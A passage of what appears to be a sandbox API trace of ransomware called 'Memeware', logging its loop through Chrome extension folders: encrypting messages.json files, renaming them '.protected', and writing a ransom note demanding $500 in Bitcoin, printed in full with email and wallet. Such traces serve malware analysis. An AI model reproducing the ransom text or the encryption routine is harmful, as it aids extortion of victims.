"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.377] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.377] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.377] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.378] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.378] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.378] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.378] CloseHandle (hObject=0x164) returned 1 [0079.378] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.378] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.378] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.378] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it") returned 142 [0079.378] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.378] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.378] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*") returned 144 [0079.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.378] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.378] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.378] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\.") returned 144 [0079.379] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.379] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.379] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 
[0079.379] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.379] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\..") returned 145 [0079.379] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.379] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.379] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.379] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.379] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.379] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.379] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.379] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.379] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.379] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.380] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json") returned 156 [0079.380] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.380] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x102, lpOverlapped=0x0) returned 1 [0079.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x102, lpOverlapped=0x0) returned 1 
[0079.381] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.381] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.381] CloseHandle (hObject=0x168) returned 1 [0079.381] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected") returned 166 [0079.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.protected")) returned 1 [0079.382] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.382] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.382] wnsprintfW (in: 
pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\RESTORE_FILES.txt") returned 160 [0079.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.382] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.382] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.383] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.383] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.383] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.383] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.384] CloseHandle (hObject=0x164) returned 1 [0079.384] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0079.384] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0079.384] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja") returned 142 [0079.384] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0079.384] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0079.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*") returned 144 [0079.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.384] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\.") returned 144 [0079.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.385] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.385] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\..") returned 145 [0079.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.385] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.385] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.385] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.385] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.385] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json") returned 156 [0079.386] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.386] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0079.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.387] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x125, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x125, lpOverlapped=0x0) returned 1 [0079.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.388] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.388] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.388] CloseHandle (hObject=0x168) returned 1 [0079.388] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected") returned 166 [0079.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.389] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.389] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.389] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\RESTORE_FILES.txt") returned 160 [0079.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
